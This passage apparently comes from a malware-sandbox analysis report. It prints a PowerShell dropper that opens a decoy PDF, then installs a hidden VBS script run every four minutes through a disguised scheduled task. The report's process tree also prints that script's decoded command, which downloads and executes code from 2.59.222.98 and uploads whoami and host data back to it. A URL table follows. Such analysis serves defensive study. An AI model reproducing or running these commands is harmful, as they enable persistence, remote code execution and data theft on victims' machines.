sjyx/yPujPkeQk+ETeG6/DH/6JDuJ3yO2Et+S5//r/Dfpf/Tf/1v/8V1hfS2///9KRjuvbCWyUf/7///pf/v//yN//1+l6W6/yT7/1p691xf3/+v/vpf//3/1//X6XpfWe///67r7S///9b/3r//m73//////X/T9Lv3/b////7191+Zr/3r1/M//X/+rv17za11/3P/2kt/6rr6/X1t11bT7X7W1/bVf6tb+1/vT1tVXVNe1v9LdfS11tcR2kqulYShpJ6ae9YStU2Glenqtqna3fdp8XDSQu9UrY1VuvvTtK7TtCoQbFIWw0ghTFcWqbaSHFJxSp2mEtC0GE00woTTsjiJ7FJsVaptJw2KSTbTTCFMMjiWmkj/0vev7r/r/69f//9ff/0uv//r/6+n0v/39fb7/f9uv69fj6/pf9aX/XW3f//8L99tfr7rX61/9tb//6v///0v+q///vrr/itf6S+v//2ul/X+t//6V22v+l616/19e/16X//dNr/7fa+v//X+tetrX7pf/+2l967f63//9fX/p//XVXtfVa9fum0m/6+/X0s5/r79r/9pNhLv9f9b+0q+npf79tL1Me1DX20v69LW9drrrpaa2raWErCrf2xX3r6X2traX/thLXVVT9Ql9pMVqVcqq2rHxB8Qd32l/a/a2kv7aV2vYVBrsVrpJba+thNbX1M3CGcFVdNO0rSiog0LSTbau70k0KTW0m0m0k001TtJNC00lik0KTTtKk1hpJp2EqT0G6DTCDUKmg04aSadpNhULTTbW20k4iGk9KraqnfaFRDWIO9UHQPCBpAgaaDimKCTIQemFTg2gQYQYTCBqEGEgmEDimKYoIMIMIMIGEGxQTCDTVB4JpBBhBhimggaBsUg0GxTQQNkR0E5EhKE7QoIMJhBxQTCDimKQYQYQbFHA7FAg2QIgVTSBoNigkEGxDBBhKQo9BtBBuiHh030v6aQTTCTrd/XS4L5Y6pr/2u+trgvafw1VAwgwthNbTWaH007ULeTHCpP2FtbI7Qa2l2F/wTCaVkdrr6IqfBCIiMIMIWCaRPWIiyUhKGEDBBhCIiIMEMuqIjCEREMIMEIgwhEMEGEIsIREREREZMLhhEYcuqIhoQYIWoQaoGEIgwhEREMJhC1QiL4TjJ7UJxxERpxERER8RpxERHERERJXafp+n/f9P7//Wkv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9K63v3f3/9f////Xj/+v/8jpfr39rx//////+x/H///FX/HH/jr7S//Xf76+146Xtdfevf/3++raXtL/Xf//9fEL/6S/44S0h//EL/6X//Hv/+or+v/79fXwv/H/5IviiR/H4X/iv/+S09+9RCBbX///CXi/Rb///8JYb1vh+ix///v/+hHfrHF//8V79LX+RwG/+lsOSsMK/JDvwlr/JQH63r+qbrI3Bom9kV9//8HuSHfr/+G/X1320u9v0v/w3/1/6IOO4qnSwwuRjv//kr/f0uv//9L9v//X/S7/f/+Se37aWPt//+3O6ftnH6/v/pfr/r+2etfr/3r0q79L2t1/9f//t7ev6917///6t7a/67/67aS+f+vb9dfb6///IPm7+1Xf16/uy8ut7IPe7r7r6+621rbW9Jba//t//9aum2hScWqelq3WmnF2qaUXVtodxaq3phJ/bSVYrpd+0ru9tul/VUu0sayIPQtukITaSDBAwgciD2KQq2k4oLIo9C20kKcJINikLatUk7dUowqd6SEWg000uwtrYT7FQopfaaaYJkrTW1tNJsVBMQlYSbUV7dIQpFf27FXaEVSDCE1MWEwpZEMIQaERDCYQMELChBhCdYWE1LIhhCGhBgpFnDUIRHFpoRENCI8REaDiIiIiIiNOIjNpGSJYiPrp6fqVNGGpkYIhnX/5BT6cHRwM52WgucZHGeoMwIcIXF670u3/hvfxER/4fZLEyPKvh3a49aX0/db0g61/v//StR/8fHfEa/9ffhJftaCdaX+Oulv/Nd7dWGl+uw/t/4S27//pbsV1//r16r7mRa///6fX783q1cqUlSdrD7X8Vp3fxXVrGpotOwqqLQiIiOGo0Mt8fX6RkXCEcIYFMBDAhgQwExtPv9aaaDtUHatfu1XH////r////6////B+v+FxOP/11+v6////+v//77X+t92vQhhC7TT9Gk/JuSQiI+/j/////8tC1FlC+WgIHOBUzIYETv4XsEDCaCXarQXfGW1xLdBfS/XyfI2MlAygs2Z1Z0ZKs2yQR2cZ2VDKM2yNkdSIFfPEcFNipmoMJgmcFPGoQYQZmEOgp4wqaDPjNmYFPswHCZ8U2KXFNinwpDBEwVBngXCYTOAuF/+jQ9Fw0Td9xaDRcNY00XDW+4aLh/0FhouGmmqaaYX+wmkndLpumpHDRcOm2mW4tLD09N07TCDTSJwg2lsXaJw0XD/4d2ttl/26cNVQdJ6cPQZLHtvTVMvK209OlTLztslmfC702k8+F3B/v1+9dbfTdN+9U/vT++//XvXT+6TdP7/////6q0v9auttJ6/////bGhrVqsf//410k2vx0k3/XFWvtf/+rXXq9CP//FccUut8Qlpbjtdaiv/f4r/3//jC4KFbX5i9v80FdvjBY2NvjC/7//8FwRMf9f1/r64RY/w2uF////ouOgsNuv4Yel4Rr23Wk/seEa/3//+XOl6W3f9tt/hL9ZeNBcudE/yx8vGl////9L0t3r93r10390v60vdLf/v//pel3G33cfVaPbuttf/S+1/7qzT/////+afWvrbHr/+l7/dev/9f//a0m13/6f///9f129tfqt9//03UMJfdet1pf/pel/71FfQvVbTW1MVPaxm+mrCVhNbdCtNNbVV06Ju+0TdtVCTaabaZG/ROGyDwmsNt7xaLhr7/cQy+/tvTLtM1gkFQZN4aDTVTOSiGRXYOGmmgwgwmFQbeW5J6CdoNBpQwmmXcNNB6ptlwmmqtvYJEbtJ8GEDCYTCbfur1vtVT1VB+n6DvCf/rpJ3poOk3+l1t+9JN071+k6slj8H9+77/q9f/7+31vT//9N9Y718x/v7aW/trVN/NNP//t3xe67X///tIcav//Xx+/0tf1dJK//7rrev/VtviopP/9+vv////fq//rpax/XaQpOul21/67fVK0v9v0v69////+/S07XVr/fCT1r4r/q3fCpP/7fHG2v//HIXv/2sfxWjD33/rjj8Lx6M+34IuLd0v7H9///w//2P0eN9P/7atv1giY/9L/pYbda/ZY+HL66X//J9v/95bvCXLt6Wn6/t1LHfpP//9Lb6/0uXz3//66eX3/86vuP29Lv/bpt9/QXy/xWkl0u2Nf6/9iv///v//6949GffXG7W30l/116//9f//r//+v/26960m/Xa/v0v+tJLr7Vfpf+/r//7/ul7161rbpV/W///S6X//9fruv/v/W/7/uv60m7/a17tLX+tKqepjrWzA+rwv62la2t3q2le2l7eseq22kq5GamQ3Jbf2n/9LTbCaatIeE0k0KTTa7VNCNVQq1TCdpJp2mmkmn3aoX2khp3aWna6elUJsTjiKwQoJqmEgmnggcUE0DTCaTFJoGxhB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1EnUy9VO1dHWVdbY11zX4Nhk2OjZbNnx2nba+9uA3AXcit0Q3ZbeHN6i3ynfr+A24L3hROHM4lPi2+Nj4+vkc+T85YTmDeaW5x/nqegy6LzpRunQ6lvq5etw6/vshu0R7ZzuKO6070DvzPBY8OXxcvH/8ozzGfOn9DT0wvVQ9d72bfb794r4Gfio+Tj5x/pX+uf7d/wH/Jj9Kf26/kv+3P9t//8CDAD3hPP7CmVuZHN0cmVhbQplbmRvYmoKMTIgMCBvYmoKWyAKPDwgL0luZm8gKHNSR0IgSUVDNjE5NjYtMi4xKS9TIC9HVFNfUERGQTEgL091dHB1dENvbmRpdGlvbklkZW50aWZpZXIgKEN1c3RvbSkKL091dHB1dENvbmRpdGlvbiAoKS9SZWdpc3RyeU5hbWUgKCkvVHlwZSAvT3V0cHV0SW50ZW50IC9EZXN0T3V0cHV0UHJvZmlsZSAxMSAwIFIgPj4gCgpdCmVuZG9iagoxMyAwIG9iago8PCAvVHlwZSAvTWV0YWRhdGEgL1N1YnR5cGUgL1hNTCAvTGVuZ3RoIDkzNiA+PiAKc3RyZWFtDQo8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/Pgo8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSI+Cgk8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczp4YXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iPgoJCQk8eGFwOkNyZWF0ZURhdGU+MjAyMy0wMi0xM1QwODo1OTo1NyswMTowMDwveGFwOkNyZWF0ZURhdGU+CgkJCTx4YXA6Q3JlYXRvclRvb2w+Q2Fub24gaVItQURWIDY1NTUgIFBERjwveGFwOkNyZWF0b3JUb29sPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpwZGY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGRmLzEuMy8iPgoJCQk8cGRmOlByb2R1Y2VyPkFkb2JlIFBTTCAxLjNlIGZvciBDYW5vbjwvcGRmOlByb2R1Y2VyPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iPgoJCQkJPGRjOmZvcm1hdD5hcHBsaWNhdGlvbi9wZGY8L2RjOmZvcm1hdD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KCQk8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgoJCQkJeG1sbnM6eGFwTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iPgoJCQk8eGFwTU06RG9jdW1lbnRJRD51dWlkOmZkZWRlOTYzLTAwMDAtNDE0Mi00MzQ0LTQ1NDYwMDAwMDAwMDwveGFwTU06RG9jdW1lbnRJRD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KPD94cGFja2V0IGVuZD0idyI/PgoKZW5kc3RyZWFtCmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvQ291bnQgMSAvS2lkcyBbMTAgMCBSIF0gPj4KZW5kb2JqCnhyZWYKMCAxNCAKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAyNjQgMDAwMDAgbiAKMDAwMDA1NTQ3MyAwMDAwMCBuIAowMDAwMDAwMzU4IDAwMDAwIG4gCjAwMDAwMjI0MzEgMDAwMDAgbiAKMDAwMDAyNjMwNCAwMDAwMCBuIAowMDAwMDI2NzAyIDAwMDAwIG4gCjAwMDAwNTEwODggMDAwMDAgbiAKMDAwMDA1MTE2OCAwMDAwMCBuIAowMDAwMDUxMzcwIDAwMDAwIG4gCjAwMDAwNTE2MTMgMDAwMDAgbiAKMDAwMDA1NDI2OCAwMDAwMCBuIAowMDAwMDU0NDUzIDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgMTQKL0luZm8gMSAwIFIKL1Jvb3QgMiAwIFIKL0lEWzw3MTM0NGRlNzFjMTA3MzI1ZTY3MGEwMzQzMTY3Yjc5OT48NzEzNDRkZTcxYzEwNzMyNWU2NzBhMDM0MzE2N2I3OTk+XQo+PgpzdGFydHhyZWYKNTU1MzIKJSVFT0YK';$fil=[System.Convert]::FromBase64String($temp);set-content
$home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9LZm5nbkhieEZIamF1Y2llL3BhZ2UxMDcvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMDcnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content
C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001
/SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f;
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr
C:\Users\Public\Libraries\Recorded.vbs /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://2.59.222.98:43820/KfngnHbx
|
unknown
|
|
|
|
http://2.59.222.98:28402/page107
|
unknown
|
|
|
|
http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt
|
2.59.222.98
|
|
|
|
http://2.59.222.98:43820/KfngnHb
|
unknown
|
|
|
|
http://2.59.222.98:43820
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
